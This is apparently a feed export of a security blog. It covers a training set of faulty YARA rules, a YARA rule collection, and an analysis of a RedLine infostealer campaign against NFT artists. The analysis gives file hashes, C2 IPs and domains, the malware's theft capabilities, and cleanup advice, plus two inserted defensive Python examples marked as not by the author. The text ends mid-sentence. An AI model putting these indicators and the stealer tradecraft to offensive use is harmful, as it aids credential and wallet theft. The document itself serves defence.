tag:blogger.com,1999:blog-6062826769557481552024-03-18T10:47:49.257+01:00Blaze's Security BlogPersonal blog about internet & malware threats.Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.comBlogger129125tag:blogger.com,1999:blog-606282676955748155.post-53591445973282853052023-12-04T20:09:00.006+01:002023-12-04T20:14:59.311+01:00Fara: Faux YARA<p><span>FARA, or Faux YARA, is a simple repository that contains a set of purposefully erroneous Yara rules. It is meant as a training vehicle for new security analysts, those that are new to Yara and even Yara veterans that want to keep their rule writing (and debugging) sharp.</span></p><p><br /></p><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiVy_MyqCt2XMu8zOAMzdoPVBOVxq69x_Nblu6mF2S-p5FBR4UtVFL1aL3E5xN_AbAyeA_ZS0GDbGubIB2uzE5FRbd7e3lmsGLvrlS68v_8WbERkfN15QWK8jBC-jGmgZOZCdqX1cvTot2MgHcKUGlVzabXwL68iI5J0wPe9rJH0cDFDZsRyGAeQlf-QPIH" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="192" data-original-width="330" height="186" src="https://blogger.googleusercontent.com/img/a/AVvXsEiVy_MyqCt2XMu8zOAMzdoPVBOVxq69x_Nblu6mF2S-p5FBR4UtVFL1aL3E5xN_AbAyeA_ZS0GDbGubIB2uzE5FRbd7e3lmsGLvrlS68v_8WbERkfN15QWK8jBC-jGmgZOZCdqX1cvTot2MgHcKUGlVzabXwL68iI5J0wPe9rJH0cDFDZsRyGAeQlf-QPIH" width="320" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Example "faux" rule</td></tr></tbody></table><br /><br /><p></p><p><span>Find it over on Github:</span></p><p><span style="color: #1f2328;"><a href="https://github.com/bartblaze/FARA">https://github.com/bartblaze/FARA</a> </span></p><div><span style="color: #1f2328;"><br 
/></span></div>Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com0tag:blogger.com,1999:blog-606282676955748155.post-12191973765117006352022-12-10T16:20:00.004+01:002022-12-10T16:20:41.556+01:00Yara rules collection<p>Quite a while ago, I published some of my private Yara rules online, on Github.</p><p>They can be found here:</p><p><a href="https://github.com/bartblaze/Yara-rules">https://github.com/bartblaze/Yara-rules</a></p><p dir="auto">There are two workflows running on that Github repository:</p>
<ul dir="auto"><li><a href="https://yara-ci.cloud.virustotal.com/" rel="nofollow">YARA-CI</a>: runs automatically to detect signature errors, as well as false positives and negatives.</li><li><a href="https://github.com/bartblaze/Yara-rules/blob/master/.github/workflows/yara.yml">Package Yara rules</a>:
allows download of a complete rules file (all Yara rules from this repo
in one file) for convenience from the Actions tab > Artifacts (see
image below).</li></ul>
<p dir="auto"><a href="https://user-images.githubusercontent.com/3075118/113322817-731feb00-9315-11eb-86ab-94f133f07038.png" rel="noopener noreferrer nofollow" target="_blank"><img alt="image" src="https://user-images.githubusercontent.com/3075118/113322817-731feb00-9315-11eb-86ab-94f133f07038.png" style="max-width: 100%;" /></a></p><p>The Yara rules are divided into:</p><ul style="text-align: left;"><li>APT</li><li>Crimeware</li><li>Generic</li><li>Hacktools</li><li>Ransomware</li></ul><p>Furthermore, the rules work natively with <a href="https://www.cyber.gc.ca/en/tools-services/assemblyline" rel="nofollow">AssemblyLine</a>, as they adopt the CCCS Yara rule standard.</p><p>PRs are welcome where you see fit.</p>Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com0tag:blogger.com,1999:blog-606282676955748155.post-73262852517387766772021-06-14T21:30:00.013+02:002021-06-24T09:52:25.506+02:00Digital artists targeted in RedLine infostealer campaign<div class="separator"><p><i>2021-06-17: updated with information from Twitter user ARC</i></p><p>In this post, we'll look at a campaign that targeted multiple 3D or digital artists who use NFTs, with malware named <b>RedLine</b>. This malware is a so-called "infostealer" or "information stealer", capable of extracting sensitive data from your machine (such as wallet information, credentials, and so on). As a side note: NFTs, or non-fungible tokens, are digital tokens tied to assets that can be bought, sold and traded.</p></div><p>This blog post is divided into four parts:</p><ul style="text-align: left;"><li><a href="#Introduction">Introduction</a>: provides an overview of what happened</li><li><a href="#Analysis">Analysis</a>: analysis of the attack and the malware used</li><li><a href="#Detection">Detection</a>: how to detect and remove the malware (skip to Detection if you just want to clean this up)</li><li><a href="#Prevention">Prevention</a>: how to prevent this from happening again</li><li><a href="#Conclusion">Conclusion</a>: a brief conclusion and additional thoughts</li></ul><h3 id="Introduction" span="" style="text-align: left;">Introduction</h3><p style="text-align: left;">From at least last Thursday, 10th of June 2021, multiple users reported on Twitter that they got hacked after being approached to create new digital art. These users, accomplished digital artists who publish their work on NFT marketplaces, were approached either via Instagram, Twitter DM (direct message) or directly via email. The attacker hid behind multiple personas, often claiming to be from South Korea. A few of the users that reported the attack:</p><p>Ariel:</p>
<blockquote class="twitter-tweet"><p dir="ltr" lang="en">Small thread on the recent attacks to NFT artists, and how to prevent it. <a href="https://twitter.com/hashtag/NFTLamers?src=hash&ref_src=twsrc%5Etfw">#NFTLamers</a> <a href="https://twitter.com/hashtag/StolenNFT?src=hash&ref_src=twsrc%5Etfw">#StolenNFT</a> <a href="https://twitter.com/hashtag/NFTArt?src=hash&ref_src=twsrc%5Etfw">#NFTArt</a> <a href="https://t.co/KvrsuyQaeT">pic.twitter.com/KvrsuyQaeT</a></p>— 🌈 ArielBeckerArt.eth #SquidGang 🦑 (@arielbeckerart) <a href="https://twitter.com/arielbeckerart/status/1403104091857985537?ref_src=twsrc%5Etfw">June 10, 2021</a></blockquote><p> </p><p>fvckrender:</p><p><br /></p> <script async="" charset="utf-8" src="https://platform.twitter.com/widgets.js"></script>
<blockquote class="twitter-tweet"><p dir="ltr" lang="en">Be really careful out there I was dumb enough to not overlook this and open their SCR file and got my metamask swiped from à to Z all my tokens gone. They tried to access other app but my 2fa blocked them to. I’m an idiot don’t me an idiot like me and secure your shit. <a href="https://t.co/gAins00taH">pic.twitter.com/gAins00taH</a></p>— FVCKRENDER (@fvckrender) <a href="https://twitter.com/fvckrender/status/1403471996017541120?ref_src=twsrc%5Etfw">June 11, 2021</a></blockquote><p> </p><p>Nicole:</p><p> <br /></p> <script async="" charset="utf-8" src="https://platform.twitter.com/widgets.js"></script>
<blockquote class="twitter-tweet"><p dir="ltr" lang="en">Really terrible day. My Metamask got hacked and now my <a href="https://twitter.com/withFND?ref_src=twsrc%5Etfw">@withFND</a> account is compromised. Opened a scam project proposal with a .scr file and a Microsoft Word icon. Anyone experience this before? Trying to figure out what to do</p>— Nicole Ruggiero (@_NicoleRuggiero) <a href="https://twitter.com/_NicoleRuggiero/status/1403500537723641859?ref_src=twsrc%5Etfw">June 11, 2021</a></blockquote><p> </p><p>ARC:</p><p> <br /></p>
<blockquote class="twitter-tweet"><p dir="ltr" lang="en">New scam just dropped, specifically targeting artists, the file seems to be a virus <a href="https://t.co/IFv8N5RBSg">pic.twitter.com/IFv8N5RBSg</a></p>— ARC (@arc4g) <a href="https://twitter.com/arc4g/status/1403400865373986823?ref_src=twsrc%5Etfw">June 11, 2021</a></blockquote> <script async="" charset="utf-8" src="https://platform.twitter.com/widgets.js"></script>
<p>Cloudy Night:</p>
<blockquote class="twitter-tweet"><p dir="ltr" lang="en">WARNING TO ALL ARTISTS<br />Got a DM from "John Billmate" claiming to be "Responsible for distribution of photo editor" from <a href="https://twitter.com/SkylumSoftware?ref_src=twsrc%5Etfw">@SkylumSoftware</a> <br /><br />DO NOT OPEN ANY LINKS FROM THIS PERSON. This is a scam, and if you got this DM, or get a dm in the future, block it. <a href="https://twitter.com/hashtag/NFTCommunity?src=hash&ref_src=twsrc%5Etfw">#NFTCommunity</a> <a href="https://twitter.com/hashtag/skylum?src=hash&ref_src=twsrc%5Etfw">#skylum</a> <a href="https://t.co/yQv68bRIjW">pic.twitter.com/yQv68bRIjW</a></p>— Cloudy Night ☁️ (@CloudyNight_k) <a href="https://twitter.com/CloudyNight_k/status/1403467670394081281?ref_src=twsrc%5Etfw">June 11, 2021</a></blockquote><p> </p><p>There are many, many more examples - however, we won't list them here. Of note is Ariel's tweet, where you can note the presence of a file named "<b>Rizin_Fight_Federation_Presentation.scr</b>". 
I'll circle back to that in the next section, Analysis.</p><h3 id="Analysis" span="" style="text-align: left;">Analysis</h3><p>After scouring the internet for a while, I was unable to find any of the files mentioned by the artists who reported the attack, until I stumbled upon Cloudy Night's tweet: their screenshot included a link to the website "skylumpro.com".</p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9ZHKOAwrOKk/YMetT4AfVhI/AAAAAAAACiM/Bad8tnWFUrUICqp8wZb9S-w-RKfmEgdCACLcBGAsYHQ/s1599/website.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="792" data-original-width="1599" height="198" src="https://1.bp.blogspot.com/-9ZHKOAwrOKk/YMetT4AfVhI/AAAAAAAACiM/Bad8tnWFUrUICqp8wZb9S-w-RKfmEgdCACLcBGAsYHQ/w400-h198/website.PNG" width="400" /></a></div><div style="clear: both;"></div><p>As expected, this is not the legitimate website, but rather a clever copycat of the real Skylum product website (the real website is: <a href="https://skylum.com/luminar-ai-b" target="_blank">https://skylum.com/luminar-ai-b</a>). After clicking the "Download Now" button, a file named "<b>SkylumLuminar (NFT Beta).rar</b>" is downloaded, which you need to extract with the password "NFT", as can be seen in Cloudy Night's tweet.</p><p>The extracted content looks as follows:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-uDB0F3oRdH8/YMetaRwPU0I/AAAAAAAACiU/iSjEHDKr6Z8ukiUjc2KIufBEMLNJf_65QCLcBGAsYHQ/s1027/files.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="567" data-original-width="1027" height="221" src="https://1.bp.blogspot.com/-uDB0F3oRdH8/YMetaRwPU0I/AAAAAAAACiU/iSjEHDKr6Z8ukiUjc2KIufBEMLNJf_65QCLcBGAsYHQ/w400-h221/files.PNG" width="400" /></a></div><div style="clear: both;"></div><p>One of the first things you may notice is the large file size of the so-called beta version. As seen earlier in Ariel's tweet, that file was 745MB, while this one is a whopping 791MB!</p><p>But why is this file so large, and why does it matter?</p><ul style="text-align: left;"><li>The attacker has appended a large chunk of <i>overlay</i> data to their original file; put simply, a bunch of extra data that does nothing.</li><li>The attacker has increased the file size this much to try and evade antivirus software and scanning tools; for example, a well-known service to scan suspicious files, <a href="https://www.virustotal.com/gui/home/upload" target="_blank">VirusTotal</a>, only accepts files up to 650MB, while some antivirus scanners may not even scan a file this large.</li><li>While you could upload the original RAR file, the attacker has password-protected it, so VirusTotal will be unable to scan it properly. 
You could re-package it, but the file itself may not be scanned.</li></ul><p>Having said all that, after removing the excessive overlay, a much more reasonable file size is obtained: 175KB. This new file's properties are:</p><ul style="text-align: left;"><li>MD5: d93de731781723b3bb43fa806c5da7d1</li><li>SHA-1: 1d49e7d163bce8cc6591ea33984796c531893b47</li><li>SHA-256: b9923cdcd07e3e490a729560aa6f7c9b153ac0359cc7fa212c65b08531575a5a</li><li>Creation Time: 2021-06-12 20:46:31</li><li>VirusTotal results: <a href="https://www.virustotal.com/gui/file/b9923cdcd07e3e490a729560aa6f7c9b153ac0359cc7fa212c65b08531575a5a/detection" target="_blank">https://www.virustotal.com/gui/file/b9923cdcd07e3e490a729560aa6f7c9b153ac0359cc7fa212c65b08531575a5a/detection</a></li></ul><p>Of note is the creation or compilation time: this is the date and time the file was originally created. While this can be spoofed, I do not believe that is the case here: the time matches when the attack appeared. It is however highly likely that more files, such as the one in Ariel's tweet, are doing the rounds.</p><p>This file then executes a second file, which is the RedLine infostealer malware. That file has the following properties:</p><ul style="text-align: left;"><li>MD5: b7df882c1b75c753186eec8fcb878932</li><li>SHA-1: a04339be16a3b48d06017f44db7e86b3c8982110</li><li>SHA-256: 2917305ac2959a98296578c46345691ccf638bdcc0559134432f5993da283faa</li><li>Creation Time: 2042-10-31 08:29:02</li><li>VirusTotal results: <a href="https://www.virustotal.com/gui/file/2917305ac2959a98296578c46345691ccf638bdcc0559134432f5993da283faa/detection" target="_blank">https://www.virustotal.com/gui/file/2917305ac2959a98296578c46345691ccf638bdcc0559134432f5993da283faa/detection</a></li></ul><p>Note the creation time is different: set in 2042. This was obviously faked by the attacker to avoid revealing when exactly the file was created. However, with the above data, we can assume it was created in the last 5 days or so.</p><p>As mentioned before, once you execute the <b>SkylumLuminarNFTBetaVersion.exe</b> file, you will be infected with the RedLine infostealer malware. Proofpoint first reported on this malware in March 2020: <a href="https://www.proofpoint.com/us/blog/threat-insight/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign" target="_blank">New Redline Password Stealer Malware</a>. This malware has many capabilities, including, but not limited to:</p><ul style="text-align: left;"><li>Steal usernames and passwords from browsers;</li><li>Collect extensive system information;</li><li>Execute commands, such as downloading and uploading other files, opening links and so on;</li><li>Steal cryptowallet information - both from Chrome extensions as well as typical <i>wallet.dat</i> files. The extensions targeted are:</li><ul><li>YoroiWallet</li><li>Tronlink</li><li>NiftyWallet</li><li>Metamask (refer also to Nicole's tweet)</li><li>MathWallet</li><li>Coinbase</li><li>BinanceChain</li><li>BraveWallet</li><li>GuardaWallet</li><li>EqualWallet</li><li>JaxxxLiberty</li><li>BitAppWallet</li></ul><li>Steal data from other software, such as:</li><ul><li>Steam;</li><li>Telegram;</li><li>FTP clients such as FileZilla.</li></ul></ul><p>The screenshot below displays part of RedLine's functionality:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-kH9Yt6kyygg/YMethCAAvDI/AAAAAAAACiY/TJ8Ui6_KV-QPgX4fiQvJ7XJ7OZo1HhFpgCLcBGAsYHQ/s855/func.PNG" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="855" data-original-width="629" height="400" src="https://1.bp.blogspot.com/-kH9Yt6kyygg/YMethCAAvDI/AAAAAAAACiY/TJ8Ui6_KV-QPgX4fiQvJ7XJ7OZo1HhFpgCLcBGAsYHQ/w294-h400/func.PNG" width="294" /></a></div><div style="clear: both;"></div><p> 
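</p><p>As an added example (not code from the original post or from the author), the following Python script shows how the overlay padding described in the analysis above can be removed by parsing the PE section table, so that a file of reasonable size can be hashed and submitted for scanning. It also reads the COFF compile timestamp, so that an impossible future date, like the 2042 stamp on the second file, can be flagged automatically. The PE it builds is a constructed, non-runnable stand-in for the inflated sample; nothing here executes the file, it only parses headers and slices bytes.</p>

```python
"""Trim appended overlay from a PE file and hash what is left (added example).

Assumption: the inflated sample is a PE executable with padding appended
after the last section. The script never runs the file.
"""
import datetime
import hashlib
import struct


def pe_image_end(data: bytes) -> int:
    """Return the offset where the last on-disk section ends.

    Bytes past this offset are overlay: the loader never maps them, which
    makes the overlay a convenient place to hide hundreds of MB of padding.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ/PE file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4                              # IMAGE_FILE_HEADER
    n_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    first_section = coff + 20 + opt_size             # IMAGE_SECTION_HEADER table
    end = first_section + n_sections * 40            # never cut inside the headers
    for i in range(n_sections):
        off = first_section + i * 40
        raw_size, raw_ptr = struct.unpack_from("<II", data, off + 16)
        end = max(end, raw_ptr + raw_size)
    return min(end, len(data))


def strip_overlay(data: bytes) -> tuple:
    """Split a file into (image, overlay); overlay is b"" if nothing is appended."""
    end = pe_image_end(data)
    return data[:end], data[end:]


def hashes(data: bytes) -> dict:
    """MD5 / SHA-1 / SHA-256 of a buffer, the three values listed in the post."""
    return {name: hashlib.new(name, data).hexdigest() for name in ("md5", "sha1", "sha256")}


def compile_time(data: bytes) -> datetime.datetime:
    """COFF TimeDateStamp as a UTC datetime."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    ts = struct.unpack_from("<I", data, e_lfanew + 8)[0]
    return datetime.datetime.fromtimestamp(ts, tz=datetime.timezone.utc)


def timestamp_is_spoofed(data: bytes, now=None) -> bool:
    """True when the compile time lies in the future, which cannot be genuine."""
    now = now or datetime.datetime.now(datetime.timezone.utc)
    return compile_time(data) > now


def build_sample_pe(overlay: bytes, timestamp: int) -> bytes:
    """Constructed, non-runnable PE with one section; stands in for the inflated file."""
    opt_size = 0xE0
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)       # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, opt_size, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)     # PE32 magic, rest zeroed
    section = b".text\0\0\0" + struct.pack(
        "<IIIIIIHHI", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = (dos + b"PE\0\0" + coff + opt + section).ljust(0x200, b"\0")
    return headers + b"\xC3" * 0x200 + overlay


if __name__ == "__main__":
    # ~1 MB of padding and a constructed year-2042 stamp, mirroring the post's sample
    sample = build_sample_pe(b"\0" * 1_000_000, 0x89000000)
    image, overlay = strip_overlay(sample)
    print(f"image {len(image)} bytes, overlay {len(overlay)} bytes")
    print(hashes(image))
    print("compile time:", compile_time(sample), "spoofed:", timestamp_is_spoofed(sample))
```

<p>The hashes of the trimmed image are what you would submit or search for; the overlay bytes are still worth keeping, since a stripped copy will no longer match the hash of the file victims actually downloaded.</p><p> 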
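</p><p>The network indicators this post reports for RedLine (the external IP lookup services it queries, the command and control IP 185.215.113.60 on port 59472, the domains xtfoarinat.xyz and sinaryaror.xyz on 92.38.163.189, and the tempuri.org SOAP namespace) can be turned into a simple triage check over proxy or firewall logs. The Python below is an added example, not code from the post: the log format and the log lines are constructed, and the destination addresses for the benign hosts are documentation-range placeholders, not real resolutions.</p>

```python
"""Scan proxy/firewall log lines for the RedLine network indicators (added example)."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Indicators as reported in the post.
C2_IPS = {"185.215.113.60", "92.38.163.189"}
C2_PORTS = {59472}
C2_DOMAINS = {"xtfoarinat.xyz", "sinaryaror.xyz"}
# Benign services the stealer uses to learn the victim's external IP. On their
# own they are noise; paired with SOAP traffic they are an early warning.
IP_LOOKUP_HOSTS = {"api.ipify.org", "icanhazip.com", "wtfismyip.com",
                   "bot.whatismyipaddress.com", "checkip.dyndns.org"}

# Constructed sample log in a simplified, assumed format (not a vendor format):
#   <time> <src_ip> <method> <url> <dst_ip>:<dst_port> [SOAPAction:<uri>]
SAMPLE_LOG = """\
2021-06-12T21:01:03Z 10.0.0.15 GET https://api.ipify.org/ 203.0.113.10:443
2021-06-12T21:01:04Z 10.0.0.15 POST http://185.215.113.60:59472/ 185.215.113.60:59472 SOAPAction:http://tempuri.org/Service/Method
2021-06-12T21:05:00Z 10.0.0.22 GET https://skylum.com/luminar-ai-b 203.0.113.8:443
2021-06-12T21:06:10Z 10.0.0.31 GET https://icanhazip.com/ 203.0.113.11:443
2021-06-12T21:06:11Z 10.0.0.31 POST http://xtfoarinat.xyz/ 92.38.163.189:80 SOAPAction:http://tempuri.org/Service/Method
2021-06-12T21:09:00Z 10.0.0.40 GET http://checkip.dyndns.org/ 203.0.113.12:80
2021-06-12T21:12:30Z 10.0.0.50 GET https://wtfismyip.com/text 203.0.113.13:443
2021-06-12T21:12:31Z 10.0.0.50 POST http://198.51.100.77:8080/ 198.51.100.77:8080 SOAPAction:http://tempuri.org/Service/Method
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+):(\d+)(?: SOAPAction:(\S+))?$")


def classify(line: str):
    """Indicators matched by one line: a list of (kind, detail), [] if benign, None if unparsable."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    _ts, _src, method, url, dst_ip, dst_port, soap = m.groups()
    host = urlsplit(url).hostname or ""
    hits = []
    if dst_ip in C2_IPS or host in C2_IPS or host in C2_DOMAINS:
        hits.append(("c2-endpoint", host or dst_ip))
    if method == "POST" and int(dst_port) in C2_PORTS:
        hits.append(("c2-port", dst_port))
    if host in IP_LOOKUP_HOSTS:
        hits.append(("ip-lookup", host))
    if soap and "tempuri.org" in soap:
        hits.append(("soap-placeholder", soap))
    return hits


def severity(kinds):
    """Any C2 indicator is high; lookup plus SOAP placeholder is medium; lookup alone is low."""
    if kinds & {"c2-endpoint", "c2-port"}:
        return "high"
    if {"ip-lookup", "soap-placeholder"} <= kinds:
        return "medium"
    if "ip-lookup" in kinds:
        return "low"
    return None


def scan(log_text: str) -> dict:
    """Group evidence per source host; hosts without indicators are omitted."""
    evidence = defaultdict(list)
    for line in log_text.splitlines():
        hits = classify(line)
        if not hits:
            continue
        evidence[line.split()[1]].extend(hits)
    report = {}
    for src, hits in evidence.items():
        sev = severity({kind for kind, _ in hits})
        if sev:
            report[src] = {"severity": sev, "evidence": hits}
    return report


if __name__ == "__main__":
    for src, finding in sorted(scan(SAMPLE_LOG).items()):
        print(src, finding["severity"], finding["evidence"])
```

<p>The "medium" tier exists because the C2 addresses rotate: a host that asks an IP lookup service who it is and then starts POSTing SOAP with a tempuri.org action to an unknown server is showing the post's described behaviour even when none of the listed IPs appear.</p><p> 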
</p><p>RedLine will first gather some basic information about your machine, such as the machine name, external IP address, your geography and so on. It gathers the external information by querying one of the following IP lookup services:</p><ul style="text-align: left;"><li>https://api.ipify.org</li><li>https://icanhazip.com</li><li>https://wtfismyip.com/text</li><li>http://bot.whatismyipaddress.com/</li><li>http://checkip.dyndns.org</li></ul><p>Note these services are <b>not</b> malicious; they are simply used by the attacker to gather more information. Interestingly enough, RedLine uses SOAP HTTP (POST) requests to talk to its command and control server (the server or machine controlled by the attacker where your data will end up), using the following IP:</p><ul style="text-align: left;"><li><b>185.215.113.60</b>;</li><li>On port 59472;</li><li>This IP resides in the Seychelles.</li></ul><p>Another domain and IP were observed in the sample from ARC's tweet above (the files in that archive were almost 600MB):</p><ul style="text-align: left;"><li><b>xtfoarinat.xyz</b>;</li><li>On IP 92.38.163.189;</li><li>This IP also has sinaryaror.xyz resolving to it, another RedLine command and control server.</li></ul><p>One may also observe connections to tempuri.org. This is the default placeholder namespace for web services and is not atypical when using SOAP over HTTP. Tempuri is <b>not</b> malicious.</p><p>Finally, after receiving all this data, the attacker can start logging into your accounts, attempt to steal your tokens, impersonate you and so on. The attacker can also install other malware if they wish, such as ransomware.</p><h3 id="Detection" span="" style="text-align: left;">What now? Detection</h3><h4 style="text-align: left;">Good news:</h4><p style="text-align: left;">The variant discussed in this blog post does not appear to <i>persist</i>: in other words, after a reboot, its process will no longer be active.</p><h4 style="text-align: left;">Bad news:</h4><p>Everything else - unfortunately, RedLine works pretty fast, and a few minutes are enough to exfiltrate all your data and for the attacker to fully compromise all your accounts.</p><p>Luckily for us, RedLine stealer <i>should</i> be detected by most commercial and free antivirus software products on the market. A few recommendations to get rid of the RedLine variant discussed in this blog post - note this may not fully cover the variant you encountered:</p><ol style="text-align: left;"><li><b>Contact</b> your NFT provider, cryptowallet provider and so on as soon as possible via <b>telephone</b> call or <b>another computer</b> and inform them of what happened; ask for a temporary block of your account or to at least temporarily block any funds from now on.<br /><b><span style="color: #ffa400;">>>> It is very important you do this first! <<<</span></b><br /><br /></li><li>If you can, <b>change your credentials from another machine</b>, such as your phone or your partner's laptop. It's recommended to change your credentials at least for your email accounts and for your wallets - focus on the most important accounts first! If you do not have this possibility, continue with the steps below. 
<br /><br /></li><li>Open Task Manager, go to the <b>Details</b> tab and search for any process with the following names:</li><ol><li>SkylumLuminarNFTBetaVersion.exe;<br />Flamingly.exe;<br />FieldTemplateFactory.exe;<br />PaintingPromoProject;<br /><i>Alternatively, the name of the file you executed</i>.</li><li>Now kill the process by right-clicking on it > select <b>End Process</b> (or <b>End Task</b>).<br /><br /></li></ol><li>If you have a firewall or proxy, block the IPs <b>185.215.113.60</b> and <b>92.38.163.189</b>.<br /><br /></li><li>Run a scan with your currently installed antivirus <b>and</b> a scan with an alternative product, for example, <a href="https://www.malwarebytes.com/" target="_blank">Malwarebytes</a> (has a free version);</li><ol><li>You can also use Eset's Online Scanner (free): <a href="https://www.eset.com/int/home/online-scanner/" target="_blank">https://www.eset.com/int/home/online-scanner/</a><br /><br /></li></ol><li>Enable the Windows Firewall: <a href="https://support.microsoft.com/en-us/windows/turn-microsoft-defender-firewall-on-or-off-ec0844f7-aebd-0583-67fe-601ecf5d774f" target="_blank">https://support.microsoft.com/en-us/windows/turn-microsoft-defender-firewall-on-or-off-ec0844f7-aebd-0583-67fe-601ecf5d774f</a></li><ol><li>While this might not have much impact at this point, it will give you an additional layer of protection from other threats;<br /><br /></li></ol><li><b>Delete</b> all the files you have previously downloaded if they still exist on your system; if you'd like me to analyse them, you may send me a copy first;<br /><br /></li><li>If the above scans have turned up:</li><ul><li><b>Clean</b>: have you executed the file?</li></ul><ol><ol><li>If not, you are <b>not</b> infected.</li><li>If you did, and the scanners turn up with nothing, it's possible your current antivirus product has blocked the attack. 
</li><li>You might also want to <a href="https://support.microsoft.com/en-us/windows/how-to-refresh-reset-or-restore-your-pc-51391d9a-eb0a-84a7-69e4-c2c1fbceb8dd" target="_blank">Refresh your PC</a> to have peace of mind.</li></ol></ol><ul><li><b>Not clean </b>(there were detections): let the above product (e.g. Malwarebytes or Eset) clean them up and reboot your computer.<br /><br /></li></ul><li>Finally, <b>reset all </b>(or the rest of) <b>your credentials</b>. Do this only when you know your machine is clean! Alternatively, reset your credentials from another machine as indicated earlier.</li></ol><p>It's important to follow these steps as soon as possible to prevent any damages. </p><p><br /></p><h3 id="Prevention" span="" style="text-align: left;">Prevention<br /></h3><p>You've come this far, or perhaps you simply skipped to this part - arguably the most important one: <b>to</b> <b>prevent this attack from happening in the first place</b>. So how can this be achieved?</p><ol style="text-align: left;"><li>First and foremost: <b>ensure you are using Windows 8.1 or later</b>. Older Operating Systems, such as Windows 7, are no longer supported by Microsoft and have additional vulnerabilities attackers may exploit;<br /><br /></li><li><b>Install an antivirus</b> and enable the Windows Firewall. <b>It does not matter if the antivirus is free or not</b>; paid versions do offer more features, but a free version will do just as much.</li><ol><li>Starting from Windows 10, Windows Defender should protect adequately from attacks such as the one described in this blog post. Other free alternatives are Kaspersky's free cloud antivirus and Malwarebytes.</li><li>When you get any file, scan it with your antivirus first! (typically done by right-clicking on the file or folder) </li><li>When in doubt, upload the file to VirusTotal. Note however the tactics used here: if there's a really large file, it
may not be scanned properly - this can be an indication of
malicious intent!<br /><br /></li></ol><li><b>Set UAC (User Account Control) to the maximum level</b>: Always Notify - this will stop some additional attacks (you will get more prompts; if you do, take a pause and verify that what's on the screen should indeed be executed). Here's how to do that: <a href="https://www.digitalcitizen.life/how-change-user-account-control-uac-levels/" target="_blank">https://www.digitalcitizen.life/how-change-user-account-control-uac-levels/</a><br /><br /></li><li><b>Enable file extensions</b>: some extensions, such as <b>.scr</b> (historically a <i>screensaver</i> file), are in fact executables which could contain malicious code, as was the case in Ariel's tweet. Do <b>not</b> open or run these files. This will also protect you against the "double extensions" trick. A file named <i>commission.jpg.exe</i> will now be visible as such - if file extensions are hidden, you would see <i>commission.jpg</i> - see the difference? Here's how you can enable file extensions: <a href="https://www.howtogeek.com/205086/beginner-how-to-make-windows-show-file-extensions/" target="_blank">https://www.howtogeek.com/205086/beginner-how-to-make-windows-show-file-extensions/</a><br /><br /></li><li><b>Create unique passwords</b> where possible and, if feasible, use a password manager;<br /><br /></li><li><b>Enable MFA</b> (or 2FA if MFA is not available) on all your sensitive accounts; this adds an additional layer which is typically very hard for the attacker to guess or crack. Google "your service/account + MFA" for specific instructions;<br /><br /></li><li>If you receive a new commission or request to create art, <b>stop and think first</b> - ask yourself these questions:</li><ol><li>Is this coming from a reputable account or from a totally new account?</li><ol><li>If reputable, can I verify their claim or request somehow?</li><li>If from a new account: be extra wary!</li><li>If from an account with very low followers/following: be extra wary! 
</li></ol><li>How will they pay me?</li><ol><li>Are they using a verified cryptowallet, or trying to set me up for something shady?</li><li>Do they have any reviews on their (public) profile, if any?</li></ol><li>What are they asking of me exactly?</li><ol><li>Are they indeed sending just images, or is there an executable file or "special software" I am supposed to download/open?</li></ol><li>Where are their links or attachments leading to?</li><ol><li>Are these leading to another service, e.g. imgur.com, or something different altogether?</li></ol><li>I have downloaded the file(s), but I do not trust the source:</li><ol><li>Delete it or ask for more information;</li><li>Block the sender if you are suspicious and report their account, and delete any files;</li><li>You can double-check by scanning the files with your antivirus, or uploading them to VirusTotal. The same nuance as above applies, however.</li></ol><li>You can also Google any information they send through to further verify their claims.<br /><br /></li></ol><li><b>Finally</b>, and where possible:</li><ol><li>Use a hardware wallet instead of a software wallet;</li><li>Secure your seed phrase: store it offline, for example on an external drive, or use pen and paper;</li><li>Verify the security settings in your wallet or crypto provider: check which other security features you can enable, and enable them.</li></ol></ol><p>Manifold, a company that creates blockchain products for NFT communities, has also written an <b>excellent</b> post-mortem of this attack which includes additional advice - I highly recommend reading it: <a href="https://manifoldxyz.substack.com/p/the-fvckrender-hack-post-mortem" target="_blank">https://manifoldxyz.substack.com/p/the-fvckrender-hack-post-mortem</a></p><div><h3 id="Conclusion" span="" style="text-align: left;">Conclusion and afterthoughts</h3><p>It's not the first time a highly targeted or specific attack occurs on communities that use crypto in some form or another; for example, at the end of 2019, Monero's download site and binaries <a href="https://bartblaze.blogspot.com/2019/11/monero-project-compromised.html" target="_blank">were compromised for a brief time</a>.</p><p>If you have been targeted by this attack, and you have been compromised, follow the advice in this blog as soon as possible to clean it up and to prevent any future attack.</p><p>This attack was quite specific 